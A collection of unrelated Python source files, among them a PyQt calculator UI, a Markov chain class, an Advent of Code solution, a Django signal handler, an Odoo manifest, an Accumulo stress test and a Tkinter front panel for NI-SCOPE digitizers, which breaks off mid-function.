    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
    self.button1.setText(_translate("MainWindow", "1"))
    self.button2.setText(_translate("MainWindow", "2"))
    self.button3.setText(_translate("MainWindow", "3"))
    self.button6.setText(_translate("MainWindow", "6"))
    self.button5.setText(_translate("MainWindow", "5"))
    self.button4.setText(_translate("MainWindow", "4"))
    self.button9.setText(_translate("MainWindow", "9"))
    self.button8.setText(_translate("MainWindow", "8"))
    self.button7.setText(_translate("MainWindow", "7"))
    self.button0.setText(_translate("MainWindow", "0"))
    self.add.setText(_translate("MainWindow", "+"))
    self.division.setText(_translate("MainWindow", "/"))
    self.subtract.setText(_translate("MainWindow", "-"))
    self.multiply.setText(_translate("MainWindow", "*"))
    self.equals.setText(_translate("MainWindow", "="))
    self.Delete.setText(_translate("MainWindow", "Del"))
    self.allClear.setText(_translate("MainWindow", "AC"))
    self.label.setText(_translate("MainWindow", "0"))
    self.square.setText(_translate("MainWindow", "a**2"))
    self.mod.setText(_translate("MainWindow", "%"))
    self.pi.setText(_translate("MainWindow", "pi"))
if __name__ == "__main__":
    import sys
    # Standard Qt bootstrap: create the application, build the window,
    # attach the generated UI, and hand control to the event loop.
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    # exec_() blocks until the window closes; its status code is the exit code.
    sys.exit(app.exec_())
|
import random
import numpy as np
class MarkovBuilder:
    """Order-N Markov chain over a fixed vocabulary of values.

    Transition counts live in an (order+1)-dimensional integer tensor
    indexed by value indices; next_value samples proportionally to the
    observed counts.  (Comments translated from the original Chinese.)
    """

    def __init__(self, value_list, order):
        """value_list: the vocabulary; order: context length in states."""
        self.reverse_value_lookup = value_list
        self.order = order
        # True until the first add() call (was the int flag 1/0).
        self.first = True
        value_num = len(value_list)
        # Total occurrences of each state in the training data; used as a
        # fallback distribution for contexts that were never observed.
        self.previous_state = [0] * value_num
        self.value_lookup = {value: i for i, value in enumerate(value_list)}
        # Transition-count tensor: one axis per context position plus one
        # axis for the successor state.
        self.matrix = np.zeros([value_num] * (order + 1), dtype=int)

    def add(self, from_value, to_value):
        """Record one observed transition from context `from_value`
        (sequence of `order` states) to successor `to_value`."""
        value_map = self.value_lookup
        counts = self.matrix
        for i in range(self.order):
            counts = counts[value_map[from_value[i]]]
        counts[value_map[to_value]] += 1
        # Bump the overall occurrence count for the successor state.
        self.previous_state[value_map[to_value]] += 1
        # On the very first call, the initial context states are part of
        # the training data too, so count them once.
        if self.first:
            for i in range(self.order):
                self.previous_state[value_map[from_value[i]]] += 1
            self.first = False

    def next_value(self, from_value):
        """Sample and return the next value given the current context.

        Raises RuntimeError if an invalid index is ever produced.
        """
        value_map = self.value_lookup
        counts = self.matrix
        for i in range(self.order):
            counts = counts[value_map[from_value[i]]]
        value_index = self.randomly_choose(counts)
        if value_index < 0:
            raise RuntimeError("Non-existent value selected.")
        return self.reverse_value_lookup[value_index]

    def randomly_choose(self, choice_counts):
        """Pick an index with probability proportional to its count.

        If every transition count is zero, fall back to the global
        state-frequency distribution gathered during training.
        """
        count_sum = sum(choice_counts)
        if count_sum == 0:
            return self.randomly_choose(self.previous_state)
        selected_count = random.randrange(1, count_sum + 1)
        counted_sum = 0
        for index, count in enumerate(choice_counts):
            counted_sum += count
            if counted_sum >= selected_count:
                return index
        raise RuntimeError("Impossible value selection made. BAD!")
|
# Parse the puzzle input: one "op ±N" instruction per line, stored as
# [index, opcode, sign, magnitude, visited-flag].
code = []
with open('data/08.txt') as f:
    for i, line in enumerate(f):
        instruction, num = line.strip().split(' ')
        # num looks like "+3" / "-12": split into its sign and magnitude.
        code.append([i, instruction, num[0], int(num[1:]), False])
def read_line(line, accumulator=0, program=None):
    """Run the hand-held console program until an instruction repeats.

    line: the [index, opcode, sign, magnitude, visited] entry to start at.
    accumulator: starting accumulator value.
    program: instruction list to execute against; defaults to the
        module-level `code` for backward compatibility.

    Prints the accumulator the moment an already-visited instruction is
    reached (as before) and now also returns it.  Rewritten iteratively:
    the original recursed once per instruction and could exhaust the
    recursion limit on long programs.
    """
    if program is None:
        program = code
    while not line[4]:
        line[4] = True  # mark visited so a revisit terminates the run
        index, op, sign, value = line[0], line[1], line[2], line[3]
        if op == 'jmp':
            line = program[index + value] if sign == '+' else program[index - value]
        else:
            if op == 'acc':
                accumulator = accumulator + value if sign == '+' else accumulator - value
            # 'acc' and 'nop' both fall through to the next instruction.
            line = program[index + 1]
    print(accumulator)
    return accumulator
read_line(code[0])
|
# Read the number of test cases, then answer each one on its own line.
num_cases = int(input())
while num_cases:
    chocolates = int(input())
    # Puzzle-specific closed form: (n - 1) // 2.
    print((chocolates - 1) // 2)
    num_cases -= 1
from django.dispatch import receiver
from vkontakte_api.signals import vkontakte_api_post_fetch
from vkontakte_groups.models import Group
from . models import GroupStatisticMembers
@receiver(vkontakte_api_post_fetch, sender=Group)
def group_statistic_create(sender, instance, **kwargs):
    """Snapshot a group's member count every time the group is fetched.

    Skips groups whose members_count has not been populated yet.
    """
    if instance.members_count is not None:
        GroupStatisticMembers.objects.create(
            group=instance,
            members_count=instance.members_count,
        )
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Odoo addon manifest for TrendAV's product/pricelist customizations.
{
    'name': 'Products & Pricelists [TrendAV]',
    'version': '1.0.1',
    # 'Hidden' keeps the module out of the Apps list; installed via dependency.
    'category': 'Hidden',
    'author': 'Ing. Rigoberto Martínez',
    'maintainer': 'TrendAV',
    'website': 'http://www.trendav.com',
    'sequence': 2,
    'depends': ['trend_base'],
    'demo': [],
    'description': """
This is the base module for managing products in Odoo - TrendAV.
================================================================
""",
    # Data files are loaded in order: access rules first, then views/reports.
    'data': [
        'security/ir.model.access.csv',
        "data/product_barcode_config.xml",
        "views/product_barcode_config_view.xml",
        "views/product_view.xml",
        "data/sequence_data.xml",
        "report/report_productlabel.xml",
    ],
    # NOTE(review): the 'test' manifest key is deprecated in modern Odoo — confirm target version.
    'test': [
    ],
    'installable': True,
    'auto_install': False,
}
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
import logging
from TestUtils import ACCUMULO_DIR
from simple.binary import BinaryTest
log = logging.getLogger('test.auto')
class BinaryStressTest(BinaryTest):
    """Stress variant of BinaryTest.

    Tiny split threshold and in-memory map limits force many tablet
    splits/flushes; the test then asserts the table's HDFS directory
    contains more than 7 entries.
    """
    order = 80

    tableSettings = BinaryTest.tableSettings.copy()
    tableSettings['bt'] = {
        'table.split.threshold': '10K',
    }
    settings = BinaryTest.settings.copy()
    settings.update({
        'tserver.memory.maps.max': '50K',
        'tserver.compaction.major.delay': 0,
    })

    def runTest(self):
        # Run the base binary ingest/verify pass first.
        BinaryTest.runTest(self)
        handle = self.runOn(self.masterHost(), [
            'hadoop', 'fs', '-ls', os.path.join(ACCUMULO_DIR, 'tables', self.getTableId('bt'))
        ])
        out, err = handle.communicate()
        # Split once instead of twice; dump the listing when the check is
        # about to fail so the log shows what was actually there.
        listing = out.split('\n')
        if len(listing) < 8:
            log.debug(out)
        # assertTrue replaces the deprecated assert_ alias (removed in
        # Python 3.12); identical semantics.
        self.assertTrue(len(listing) > 7)
def suite():
    """Build and return this module's test suite (the stress test only)."""
    tests = unittest.TestSuite()
    tests.addTest(BinaryStressTest())
    return tests
|
from Classes.Client import Client
from Classes.Product import Product
from Classes.Service import Service
def menu():
    """Show the registration menu (Portuguese) and return the chosen option.

    NOTE: Python 2 module — uses the print statement and input().
    """
    # Backslash continuations keep the menu as one string literal.
    print "\
1 - Cadastrar cliente: \n\
2 - Cadastrar Produto: \n\
3 - Cadastrar Servico: "
    opcao = input("Digite a sua opcao: ")
    return opcao
def switch(x):
    """Dispatch menu option x (1-3) to the matching registration action.

    Raises KeyError for any other option (caught by the caller).
    """
    handlers = {
        1: Client().add_client,
        2: Product().add_product,
        3: Service().add_service,
    }
    handlers[x]()
if __name__ == '__main__':
    try:
        # Show the menu forever; any error (including a bad option's
        # KeyError) aborts the loop with a message.
        while True:
            switch(menu())
    except Exception as e:
        print "Erro: %s"%e
|
from tkinter import *
from tkinter import ttk
from tkinter.tix import *
from tkintertable import TableCanvas, TableModel
import nimodinst
import niscope
import warnings
import matplotlib
import sys
import time
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import numpy as np
class NIScopeSFP():
    """Tk-based soft front panel demo for NI-SCOPE digitizers.

    __init__ builds the entire GUI (configuration, trigger, graph and
    measurement panes), opens an niscope.Session for the selected
    device, and enters the Tk main loop.  While "Run" is active the app
    periodically fetches waveforms and measurement statistics.
    """
    def __init__(self):
        """Build the GUI, apply initial config/trigger settings, and run
        the Tk main loop (blocks until the window is closed)."""
        # Basic Vars
        self.blocked = True                     # True while fetching is paused
        self.tempcounter = 0
        self.meas_array = ["NO_MEASUREMENT"]    # measurements shown in the table
        self.dev_name = ""                      # device the session was opened on
        self.root = Tk()
        self.root.title("NI-SCOPE Measurement Library DEMO")
        self.root.columnconfigure(0, weight=1)
        self.root.rowconfigure(0, weight=1)
        self.scrollwin = ScrolledWindow(self.root)
        self.scrollwin.grid(column=0, row=0)
        self.win = self.scrollwin.window
        self.mainframe = ttk.Frame(self.win)
        self.mainframe.grid(column=0, row=0)
        self.mainframe.columnconfigure(0, weight=1)
        self.mainframe.rowconfigure(0, weight=1)
        ### CONFIG FRAME
        self.config_frame = ttk.Frame(self.mainframe, borderwidth=5, height=200, width=400, relief="solid")
        self.config_frame.grid(column=0, row=0, columnspan=6, rowspan=6, sticky=(N, S, E, W))
        self.config_frame.columnconfigure(0, weight=1)
        self.config_frame.rowconfigure(0, weight=1)
        self.label_device = ttk.Label(self.config_frame, text="Current Device")
        self.label_device.grid(column=0, row=0, sticky=(W))
        self.curr_device = StringVar()
        self.device_select = ttk.Combobox(self.config_frame, textvariable=self.curr_device)
        self.device_select["values"] = self._get_devices()
        self.device_select.insert(0, self._get_devices()[0])
        self.device_select.grid(column=0, row=1, sticky=(W))
        self.label_channels = ttk.Label(self.config_frame, text="Current Channel(s)")
        self.label_channels.grid(column=0, row=2, sticky=(W))
        self.curr_channel = StringVar()
        self.channel_select = ttk.Entry(self.config_frame, textvariable=self.curr_channel)
        self.channel_select.grid(column=0, row=3, sticky=(W))
        self.channel_select.insert(0, 0)
        self.label_min_sample_rate = ttk.Label(self.config_frame, text="Min Sample Rate")
        self.label_min_sample_rate.grid(column=1, row=0, sticky=(N, W))
        self.curr_min_sample_rate = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
        self.curr_min_sample_rate.grid(column=1, row=1, sticky=(W))
        self.curr_min_sample_rate.insert(0, 100000)
        self.label_min_record_length = ttk.Label(self.config_frame, text="Min Record Length")
        self.label_min_record_length.grid(column=1, row=2, sticky=(W))
        self.curr_min_record_length = Spinbox(self.config_frame, from_=1, to=sys.maxsize)
        self.curr_min_record_length.grid(column=1, row=3, sticky=(W))
        # NOTE(review): inserts "000" after the spinbox's initial "1",
        # presumably to display 1000 — confirm intended default.
        self.curr_min_record_length.insert(1, "000")
        self.label_vertical_range = ttk.Label(self.config_frame, text="Vertical Range (V)")
        self.label_vertical_range.grid(column=2, row=0, sticky=(N, W))
        self.curr_vertical_range = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
        self.curr_vertical_range.grid(column=2, row=1, sticky=(W))
        self.curr_vertical_range.delete(0)
        self.curr_vertical_range.insert(0, 1)
        self.label_vertical_offset = ttk.Label(self.config_frame, text="Vertical Offset (V)")
        self.label_vertical_offset.grid(column=2, row=2, sticky=(W))
        self.curr_vertical_offset = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
        self.curr_vertical_offset.grid(column=2, row=3, sticky=(W))
        self.label_probe_attenuation = ttk.Label(self.config_frame, text="Probe Attenuation")
        self.label_probe_attenuation.grid(column=1, row=4, sticky=(W))
        self.curr_probe_attenuation = Spinbox(self.config_frame, from_=0, to=sys.maxsize)
        self.curr_probe_attenuation.grid(column=1, row=5, sticky=(W))
        self.curr_probe_attenuation.delete(0)
        self.curr_probe_attenuation.insert(0, 1)
        self.label_vertical_coupling = ttk.Label(self.config_frame, text="Vertical Coupling")
        self.label_vertical_coupling.grid(column=2, row=4, sticky=(W))
        self.vertical_coupling = StringVar()
        self.curr_vertical_coupling = ttk.Combobox(self.config_frame, textvariable=self.vertical_coupling)
        self.curr_vertical_coupling.grid(column=2, row=5, sticky=(W))
        self.curr_vertical_coupling["values"] = ("AC", "DC", "Ground")
        self.curr_vertical_coupling.insert(0, "AC")
        self.curr_vertical_coupling.config(state="readonly")
        self.self_cal_button = ttk.Button(self.config_frame, text="Self Calibration (slow)", command=self.self_cal)
        self.self_cal_button.grid(column=5, row=0, sticky=(N, E))
        self.start_stop_button = ttk.Button(self.config_frame, text="Run", command=self.start)
        self.start_stop_button.grid(column=4, row=0, sticky=(N, W))
        self.error_frame = ttk.Frame(self.config_frame, borderwidth=5, relief="sunken")
        self.error_frame.grid(column=4, row=1, columnspan=2, rowspan=5, sticky=(E))
        self.label_error_text = Text(self.error_frame, width=40, height=10, wrap=WORD)
        self.label_error_text.grid(column=4, row=2)
        self.update_settings_button = ttk.Button(self.config_frame, text="Update Configuration", command=self.update_config)
        self.update_settings_button.grid(column=0, row=5, columnspan=2, sticky=(W))
        #TODO: make update button actually do shit + error_text return.
        ### ACTIVE FRAME
        self.active_frame = ttk.Frame(self.mainframe, borderwidth=5, height=200, width=400, relief="solid")
        self.active_frame.grid(column=0, row=6, columnspan=6, rowspan=3, sticky=(N, S, E, W))
        # One notebook tab per supported trigger type.
        self.trigger_notebook = ttk.Notebook(self.active_frame)
        self.trigger_notebook.grid(column=0, row=6, columnspan=2, rowspan=5, sticky=(N, S, E, W))
        self.digital_trigger = ttk.Frame(self.trigger_notebook)
        self.edge_trigger = ttk.Frame(self.trigger_notebook)
        self.hysteresis_trigger = ttk.Frame(self.trigger_notebook)
        self.immediate_trigger = ttk.Frame(self.trigger_notebook)
        self.window_trigger = ttk.Frame(self.trigger_notebook)
        self.trigger_notebook.add(self.digital_trigger, text="Digital")
        self.trigger_notebook.add(self.edge_trigger, text="Edge")
        self.trigger_notebook.add(self.hysteresis_trigger, text="Hysteresis")
        self.trigger_notebook.add(self.immediate_trigger, text="Immediate")
        self.trigger_notebook.add(self.window_trigger, text="Window")
        self.update_trigger_settings_button = ttk.Button(self.active_frame, text="Update Trigger Settings", command=self.update_trigger)
        self.update_trigger_settings_button.grid(column=0, row=11, sticky=(N, W))
        # Digital Trigger
        self.label_digital_trigger_source = ttk.Label(self.digital_trigger, text="Trigger Source")
        self.label_digital_trigger_source.grid(column=0, row=6, sticky=(E))
        self.digital_trigger_source = StringVar()
        self.curr_digital_trigger_source = ttk.Entry(self.digital_trigger, textvariable=self.digital_trigger_source)
        self.curr_digital_trigger_source.grid(column=1, row=6, sticky=(W))
        self.curr_digital_trigger_source.insert(0, "PXI_Trig0")
        self.label_digital_trigger_slope = ttk.Label(self.digital_trigger, text="Trigger Slope")
        self.label_digital_trigger_slope.grid(column=0, row=7, sticky=(E))
        self.digital_trigger_slope = StringVar()
        self.curr_digital_trigger_slope = ttk.Combobox(self.digital_trigger, textvariable=self.digital_trigger_slope)
        self.curr_digital_trigger_slope.grid(column=1, row=7, sticky=(W))
        self.curr_digital_trigger_slope["values"] = ("Positive", "Negative")
        self.curr_digital_trigger_slope.insert(0, "Positive")
        self.curr_digital_trigger_slope.config(state="readonly")
        # Edge Trigger
        self.label_edge_trigger_source = ttk.Label(self.edge_trigger, text="Trigger Source")
        self.label_edge_trigger_source.grid(column=0, row=6, sticky=(E))
        self.edge_trigger_source = StringVar()
        self.curr_edge_trigger_source = ttk.Entry(self.edge_trigger, textvariable=self.edge_trigger_source)
        self.curr_edge_trigger_source.grid(column=1, row=6, sticky=(W))
        self.curr_edge_trigger_source.insert(0, "0")
        self.label_edge_trigger_level = ttk.Label(self.edge_trigger, text="Trigger Level")
        self.label_edge_trigger_level.grid(column=0, row=7, sticky=(E))
        self.curr_edge_trigger_level = Spinbox(self.edge_trigger, from_=0, to=sys.maxsize)
        self.curr_edge_trigger_level.grid(column=1, row=7, sticky=(W))
        self.label_edge_trigger_slope = ttk.Label(self.edge_trigger, text="Trigger Slope")
        self.label_edge_trigger_slope.grid(column=0, row=8, sticky=(E))
        self.edge_trigger_slope = StringVar()
        self.curr_edge_trigger_slope = ttk.Combobox(self.edge_trigger, textvariable=self.edge_trigger_slope)
        self.curr_edge_trigger_slope.grid(column=1, row=8, sticky=(W))
        self.curr_edge_trigger_slope["values"] = ("Positive", "Negative")
        self.curr_edge_trigger_slope.insert(0, "Positive")
        self.curr_edge_trigger_slope.config(state="readonly")
        self.label_edge_trigger_coupling = ttk.Label(self.edge_trigger, text="Trigger Coupling")
        self.label_edge_trigger_coupling.grid(column=0, row=9, sticky=(E))
        self.edge_trigger_coupling = StringVar()
        self.curr_edge_trigger_coupling = ttk.Combobox(self.edge_trigger, textvariable=self.edge_trigger_coupling)
        self.curr_edge_trigger_coupling.grid(column=1, row=9, sticky=(W))
        self.curr_edge_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
        self.curr_edge_trigger_coupling.insert(0, "AC")
        self.curr_edge_trigger_coupling.config(state="readonly")
        # Hysteresis Trigger
        self.label_hysteresis_trigger_source = ttk.Label(self.hysteresis_trigger, text="Trigger Source")
        self.label_hysteresis_trigger_source.grid(column=0, row=6, sticky=(E))
        self.hysteresis_trigger_source = StringVar()
        self.curr_hysteresis_trigger_source = ttk.Entry(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_source)
        self.curr_hysteresis_trigger_source.grid(column=1, row=6, sticky=(W))
        self.curr_hysteresis_trigger_source.insert(0, "0")
        self.label_hysteresis_trigger_level = ttk.Label(self.hysteresis_trigger, text="Trigger Level")
        self.label_hysteresis_trigger_level.grid(column=0, row=7, sticky=(E))
        self.curr_hysteresis_trigger_level = Spinbox(self.hysteresis_trigger, from_=0, to=sys.maxsize)
        self.curr_hysteresis_trigger_level.grid(column=1, row=7, sticky=(W))
        self.label_hysteresis = ttk.Label(self.hysteresis_trigger, text="Hysteresis")
        self.label_hysteresis.grid(column=0, row=8, sticky=(E))
        self.curr_hysteresis = Spinbox(self.hysteresis_trigger, from_=0, to=sys.maxsize)
        self.curr_hysteresis.grid(column=1, row=8, sticky=(W))
        self.label_hysteresis_trigger_slope = ttk.Label(self.hysteresis_trigger, text="Trigger Slope")
        self.label_hysteresis_trigger_slope.grid(column=0, row=9, sticky=(E))
        self.hysteresis_trigger_slope = StringVar()
        self.curr_hysteresis_trigger_slope = ttk.Combobox(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_slope)
        self.curr_hysteresis_trigger_slope.grid(column=1, row=9, sticky=(W))
        self.curr_hysteresis_trigger_slope["values"] = ("Positive", "Negative")
        self.curr_hysteresis_trigger_slope.insert(0, "Positive")
        self.curr_hysteresis_trigger_slope.config(state="readonly")
        self.label_hysteresis_trigger_coupling = ttk.Label(self.hysteresis_trigger, text="Trigger Coupling")
        self.label_hysteresis_trigger_coupling.grid(column=0, row=10, sticky=(E))
        self.hysteresis_trigger_coupling = StringVar()
        self.curr_hysteresis_trigger_coupling = ttk.Combobox(self.hysteresis_trigger, textvariable=self.hysteresis_trigger_coupling)
        self.curr_hysteresis_trigger_coupling.grid(column=1, row=10, sticky=(W))
        self.curr_hysteresis_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
        self.curr_hysteresis_trigger_coupling.insert(0, "AC")
        self.curr_hysteresis_trigger_coupling.config(state="readonly")
        # Immediate Trigger
        self.label_immediate_trigger = ttk.Label(self.immediate_trigger, text="N/A")
        self.label_immediate_trigger.grid(column=0, row=6, sticky=(N))
        # Window Trigger
        self.label_window_trigger_source = ttk.Label(self.window_trigger, text="Trigger Source")
        self.label_window_trigger_source.grid(column=0, row=6, sticky=(E))
        self.window_trigger_source = StringVar()
        self.curr_window_trigger_source = ttk.Entry(self.window_trigger, textvariable=self.window_trigger_source)
        self.curr_window_trigger_source.grid(column=1, row=6, sticky=(W))
        self.curr_window_trigger_source.insert(0, "0")
        self.label_window_mode = ttk.Label(self.window_trigger, text="Window Mode")
        self.label_window_mode.grid(column=0, row=7, sticky=(E))
        self.window_mode = StringVar()
        self.curr_window_mode = ttk.Combobox(self.window_trigger, textvariable=self.window_mode)
        self.curr_window_mode.grid(column=1, row=7, sticky=(W))
        self.curr_window_mode["values"] = ("Entering", "Leaving")
        self.curr_window_mode.insert(0, "Entering")
        self.curr_window_mode.config(state="readonly")
        self.label_window_low_level = ttk.Label(self.window_trigger, text="Window Low Level")
        self.label_window_low_level.grid(column=0, row=8, sticky=(E))
        self.curr_window_low_level = Spinbox(self.window_trigger, from_=-sys.maxsize, to=sys.maxsize)
        self.curr_window_low_level.grid(column=1, row=8, sticky=(W))
        self.curr_window_low_level.delete(0, "end")
        self.curr_window_low_level.insert(0, 0)
        self.label_window_high_level = ttk.Label(self.window_trigger, text="Window High Level")
        self.label_window_high_level.grid(column=0, row=9, sticky=(E))
        self.curr_window_high_level = Spinbox(self.window_trigger, from_=-sys.maxsize, to=sys.maxsize)
        self.curr_window_high_level.grid(column=1, row=9, sticky=(W))
        self.curr_window_high_level.delete(0, "end")
        self.curr_window_high_level.insert(0, 0)
        self.label_window_trigger_coupling = ttk.Label(self.window_trigger, text="Trigger Coupling")
        self.label_window_trigger_coupling.grid(column=0, row=10, sticky=(E))
        self.window_trigger_coupling = StringVar()
        self.curr_window_trigger_coupling = ttk.Combobox(self.window_trigger, textvariable=self.window_trigger_coupling)
        self.curr_window_trigger_coupling.grid(column=1, row=10, sticky=(W))
        self.curr_window_trigger_coupling["values"] = ("AC", "DC", "HF_REJECT", "LF_REJECT", "AC_PLUS_HF_REJECT")
        self.curr_window_trigger_coupling.insert(0, "AC")
        self.curr_window_trigger_coupling.config(state="readonly")
        ### GRAPH FRAME
        self.graph_frame = ttk.Frame(self.active_frame, borderwidth=5, relief="sunken")
        self.graph_frame.grid(column=2, row=6, columnspan=4, rowspan=6, sticky=(N, S, E, W))
        self.graph_plot = Figure(figsize=(5,5), dpi=100)
        self.subplot = self.graph_plot.add_subplot(111)
        self.subplot.plot([0],[0])
        self.graph_canvas = FigureCanvasTkAgg(self.graph_plot, self.graph_frame)
        self.graph_canvas.draw()
        self.graph_canvas.get_tk_widget().grid(column=2, row=6, columnspan=4, rowspan=6, sticky=(N, S, E, W))
        # TODO: make graph functional
        ### MEASUREMENTS FRAME
        self.measurements_frame = ttk.Frame(self.mainframe)
        self.measurements_frame.grid(column=0, row=12, columnspan=6, sticky=(N, S, E, W))
        self.meas_label = ttk.Label(self.measurements_frame, text="Measurements")
        self.meas_label.grid(column=0, row=12, columnspan=2, sticky=(W))
        self.add_meas = ttk.Button(self.measurements_frame, text="+", command=self.add_measurement)
        self.add_meas.grid(column=2, row=12)
        self.remove_meas = ttk.Button(self.measurements_frame, text="-", command=self.remove_measurement)
        self.remove_meas.grid(column=3, row=12)
        self.table_frame = ttk.Frame(self.mainframe)
        self.table_frame.grid(column=0, row=13)
        self.test_data = {"MEAS_1": {"Measurement": "NO_MEASUREMENT", "Channel": 0, "Result": 0, "Mean": 0, "StDev": 0, "Min": 0, "Max": 0, "Num in Stats": 0}}
        self.table = TableCanvas(self.table_frame, data=self.test_data, read_only=True)
        self.table.show()
        #TODO: make table read from actual measurements in live time (w/ stats)
        # Setup functions
        self.session = None
        self.update_config()
        self.update_trigger()
        self._set_message("Ready!")
        self.root.mainloop()

    def _get_devices(self):
        """Return the names of all NI-SCOPE devices visible to nimodinst."""
        with nimodinst.Session("niscope") as session:
            return [dev.device_name for dev in session.devices]

    def _get_measurements(self):
        """Return all scalar measurement names not already selected."""
        return [i.name for i in niscope.enums.ScalarMeasurement if not i.name in self.meas_array]

    def _set_message(self, text):
        """Replace the contents of the (read-only) status text box."""
        self.label_error_text.config(state=NORMAL)
        self.label_error_text.delete(1.0, "end")
        self.label_error_text.insert(1.0, text)
        self.label_error_text.config(state=DISABLED)

    def _start_fetching(self):
        """Self-rescheduling fetch loop: refresh graph and table every
        second until self.blocked is set."""
        if self.blocked:
            return
        self.update_graph()
        self.update_table()
        self.root.after(1000, self._start_fetching)

    def add_measurement(self):
        """Open a modal-ish picker window for adding one measurement."""
        self.add_meas_window = Toplevel(self.root)
        add_meas_window_frame = ttk.Frame(self.add_meas_window)
        add_meas_window_frame.grid(column=0, row=0)
        add_meas_label = ttk.Label(add_meas_window_frame, text="Choose a measurement to add.")
        add_meas_label.grid(column=1, row=0, sticky=(N))
        meas_to_add = StringVar()
        self.add_meas_combobox = ttk.Combobox(add_meas_window_frame, textvariable=meas_to_add)
        possible_meas = self._get_measurements()
        self.add_meas_combobox.grid(column=1, row=1, sticky=(N))
        self.add_meas_combobox["values"] = possible_meas
        # NOTE(review): pre-fills with possible_meas[1], not [0] — confirm intended.
        self.add_meas_combobox.insert(0, possible_meas[1])
        self.add_meas_combobox.config(state="readonly")
        add_meas_button = ttk.Button(add_meas_window_frame, text="Add", command=self.confirm_measurement)
        add_meas_button.grid(column=0, row=2, sticky=(W))
        cancel_meas_button = ttk.Button(add_meas_window_frame, text="Cancel", command=self.cancel_measurement)
        cancel_meas_button.grid(column=2, row=2, sticky=(E))

    def cancel_measurement(self):
        """Dismiss the add-measurement picker without changes."""
        self.add_meas_window.destroy()

    def confirm_measurement(self):
        """Commit the picked measurement and refresh the stats table."""
        self.meas_array.append(self.add_meas_combobox.get())
        self._set_message("Measurement {0} added!".format(self.add_meas_combobox.get()))
        self.add_meas_window.destroy()
        self.update_table()

    def dummy(self):
        """Debug helper: overwrite the channel entry with 'dummy' (unused)."""
        self.channel_select.delete(0, "end")
        self.channel_select.insert(0, "dummy")

    def remove_measurement(self):
        """Drop the most recently added measurement, if any."""
        if(len(self.meas_array) == 0):
            self._set_message("No measurements to remove!")
        else:
            del self.meas_array[-1]
            self.update_table()

    def self_cal(self):
        """Stop fetching and run the device's (slow) self-calibration."""
        self._set_message("Now calibrating...")
        self.stop()
        try:
            # NOTE(review): the with-block closes self.session on exit, so
            # later fetches will fail until update_config reopens — confirm.
            with self.session as session:
                session.self_cal()
        except Exception as e:
            self._set_message(str(e))
        else:
            self._set_message("Self calibration successful!")

    def start(self):
        # Begin indefinitely fetching
        self.start_stop_button.configure(text="Stop", command=self.stop)
        self.blocked = False
        self._start_fetching()

    def stop(self):
        # Stop indefinitely fetching
        self.start_stop_button.configure(text="Run", command=self.start)
        self.blocked = True

    def update_config(self):
        """Apply the config pane to the session, (re)opening the session
        when the selected device changed; report status in the text box."""
        try:
            # Single channel indices are ints; ranges like "0,1" stay strings.
            self.config_channels = int(self.curr_channel.get())
        except:
            self.config_channels = self.curr_channel.get()
        # Invalidate the cached x-axis so update_graph rebuilds it.
        self.cached_absolute_initial_x = 0.0
        self.cached_x_increment = 0.0
        try:
            if self.dev_name != self.curr_device.get():
                if self.session is not None:
                    self.session.close()
                self.session = niscope.Session(self.curr_device.get())
                self.dev_name = self.curr_device.get()
            self.session.configure_vertical(range=float(self.curr_vertical_range.get()),
                coupling=niscope.VerticalCoupling[self.curr_vertical_coupling.get()],
                offset=float(self.curr_vertical_offset.get()), probe_attenuation=float(self.curr_probe_attenuation.get()))
            self.session.configure_horizontal_timing(min_sample_rate=float(self.curr_min_sample_rate.get()),
                min_num_pts=int(self.curr_min_record_length.get()), ref_position=50.0, num_records=1, enforce_realtime=True)
        except Exception as e:
            self._set_message(str(e))
        else:
            self._set_message("Successfully updated configuration!")

    def update_graph(self):
        """Fetch one acquisition and redraw the waveform plot."""
        if self.blocked:
            return
        try:
            with self.session.initiate():
                # NOTE(review): num_samples is taken from the sample-rate
                # spinbox, not record length — confirm this is intended.
                wfm_infos = self.session.channels[self.config_channels].fetch(num_samples=int(self.curr_min_sample_rate.get()))
            # Rebuild the x axis only when the timing actually changed.
            if self.cached_x_increment != wfm_infos[0].x_increment or self.cached_absolute_initial_x != wfm_infos[0].absolute_initial_x:
                self.cached_x_axis_values = []
                for i in range(int(self.curr_min_sample_rate.get())):
                    self.cached_x_axis_values.append(wfm_infos[0].absolute_initial_x + (i * wfm_infos[0].x_increment))
                self.cached_x_increment = wfm_infos[0].x_increment
                self.cached_absolute_initial_x = wfm_infos[0].absolute_initial_x
            self.subplot.clear()
            for wfm_info in wfm_infos:
                self.subplot.plot(self.cached_x_axis_values, wfm_info.samples)
            self.graph_canvas.draw()
        except Exception as e:
            self._set_message(str(e))

    def update_table(self):
        """Fetch statistics for each selected measurement and rebuild the
        read-only results table."""
        try:
            temp_dict = {}
            for meas in self.meas_array:
                with self.session.initiate():
                    measurement_stat = self.session.channels[self.config_channels].fetch_measurement_stats(
                        niscope.enums.ScalarMeasurement[meas], 5.0)
                for stat in measurement_stat:
                    inner_temp_dict = {}
                    inner_temp_dict["Measurement"] = meas
                    inner_temp_dict["Channel"] = stat.channel
                    inner_temp_dict["Result"] = stat.result
